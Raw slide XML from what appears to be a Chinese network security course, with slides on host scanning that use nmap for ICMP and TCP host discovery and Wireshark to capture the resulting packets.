                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤五</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>05</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5029200" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.1 主机扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="126" name="文本框 125"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5551805" y="1209675"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2.利用Wireshark工具抓取nmap工具发送的数据包，如图2-2-22所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5551805" y="1854835"/>
            <a:ext cx="5276850" cy="3581400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="127" name="文本框 126"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5551805" y="5436235"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-22 Wireshark工具抓取数据包</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="854075"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="854560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="522266"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap工具进行ICMP和TCP协议的主机发现并分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤五</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>05</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5029200" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.1 主机扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="127" name="文本框 126"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5649595" y="965835"/>
            <a:ext cx="5080000" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>3.筛选信息进行分析，可以发现nmap工具会发送ICMP请求和TCP请求到目标主机，如图2-2-23所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5649595" y="1887855"/>
            <a:ext cx="5276850" cy="3600450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="128" name="文本框 127"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5649595" y="5488305"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-23 ICMP数据包和TCP请求</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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0" name="组合 49"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="258445" y="2941320"/>
            <a:ext cx="11638280" cy="2962910"/>
            <a:chOff x="407" y="2772"/>
            <a:chExt cx="18328" cy="4666"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="2" name="Group 3"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="407" y="5987"/>
              <a:ext cx="18328" cy="121"/>
              <a:chOff x="1765833" y="4036682"/>
              <a:chExt cx="9317522" cy="50962"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="3" name="Rectangle 4"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3040807" y="4036682"/>
                <a:ext cx="1683494" cy="50962"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="4" name="Rectangle 5"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4724303" y="4036682"/>
